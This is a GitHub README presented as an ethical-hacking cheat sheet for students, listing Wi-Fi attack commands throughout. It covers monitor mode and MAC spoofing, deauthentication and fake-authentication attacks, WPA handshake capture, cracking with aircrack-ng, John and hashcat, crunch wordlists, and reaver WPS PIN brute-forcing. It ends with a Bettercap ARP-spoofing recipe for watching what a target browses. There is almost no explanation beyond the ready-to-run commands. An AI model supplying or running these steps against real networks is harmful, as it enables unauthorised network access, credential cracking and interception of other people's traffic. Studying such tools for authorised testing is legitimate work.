ohm-vishwa/Ethical-Hacking-Cheat-Sheet

Wifi Hacking

Commands
Network Manager Commands
Network Adapter Testing Commands
Changing MAC Address
Sniff Network
Capture Data
Analyse Data
Associate with Router
DE-Authentication Attack
Fake-Authentication Attack
WPA Handshake Capture
Password Cracking Using John
Password Cracking using wordlist
Create word list
Password Cracking Without Word list

Network Manager commands

Kill Network Manager

airmon-ng check kill

Enable Network Manager

service NetworkManager start

Restart Network Manager

systemctl restart NetworkManager

Check Status of Network Manager

systemctl status NetworkManager

Network Adapter Testing Commands

Enable Monitor Mode

airmon-ng start wlan1

Disable Monitor Mode

airmon-ng stop wlan1

Packet Injection test

aireplay-ng --test wlan1

Access Point Creation test

You can use any fake MAC address, for example 00:01:02:03:04:05.

airbase-ng -a 00:01:02:03:04:05 --essid "<AP_name>" -c {channel_no.} wlan1

Changing MAC Address

ifconfig wlan1 down
ifconfig wlan1 hw ether 00:11:22:33:44:55
ifconfig wlan1 up

Sniff Network

Sniff Network around 2.4 GHz

airodump-ng wlan1

Sniff Network around 5 GHz

airodump-ng --band a wlan1

Sniff Network on both 2.4 GHz and 5 GHz

airodump-ng --band abg wlan1

Capture Data

airodump-ng --bssid {router_MAC_add} --channel {channel_no.} --write {file_name_without_extension} wlan1

Analyse Data

wireshark

Associate with router

aireplay-ng --fakeauth 0 -a {router_MAC_add} -h {Your_NIC_MAC_add} wlan1

DE-Authentication Attack

aireplay-ng --deauth {no_of_deauth_packets} -a {router_MAC_add} -c {target_MAC_add} wlan1

If it fails, target the router on its specific channel:

airodump-ng --bssid {router_MAC_add} --channel {channel_no.} wlan1

Fake-Authentication Attack

aireplay-ng --fakeauth {delay} -a {router_MAC_add} -h {your_NIC_MAC} wlan1

WPA Handshake Capture

airodump-ng --bssid {router_MAC_add} --channel {channel_no.} --write {file_name_without_extn} wlan1

Password Cracking Using John

.cap to .hccap

aircrack-ng {.cap} -J {extension_name_not_required}

.hccap to .txt

hccap2john {.hccap} > {.txt}

Crack Password

john {.txt}

Password Cracking using wordlist

aircrack-ng {.cap} -w {Wordlist.txt}

Create word list

man crunch
# 6 8 = minimum and maximum key length, abc12 = characters used
crunch 6 8 abc12 -o test.txt

Create word list using pattern

crunch {key_length Ex: 6 8} {char_used Ex: abc12} -o {.txt} -t {pattern Ex: a@@@@b}

Password Cracking Without Word list

Scan for WPS-enabled networks around us

wash --interface wlan1

Warning

The current version of reaver has some bugs; you can use an older version.

Brute-force the PIN

reaver --bssid {router_MAC_add} --channel {channel_no.} --interface wlan1 -vvv --no-associate 



Bettercap

sudo bettercap -iface wlx242fd0da04dc
set arp.spoof.fullduplex true
net.show
set arp.spoof.targets <target_ip>
arp.spoof on

To see what the target browses:

net.sniff on 

Password Cracking Using Hashcat

sudo airmon-ng check kill
sudo systemctl stop NetworkManager.service
sudo systemctl stop wpa_supplicant.service
sudo ip link set wlan1 down
sudo iw dev wlan1 set type monitor
sudo ip link set wlan1 up
sudo hcxdumptool -i wlan1 -w dumpfile.pcapng
hcxpcapngtool -o hash.hc22000 -E essidlist dumpfile.pcapng
hashcat -a 0 -m 22000 hash.hc22000 /usr/share/wordlists/rockyou.txt -D 2
hashcat -m 22000 hash.hc22000 wordlist.txt
sudo systemctl start wpa_supplicant.service
sudo systemctl start NetworkManager.service

About

Ethical Hacking Cheat Sheet for Cyber Security Students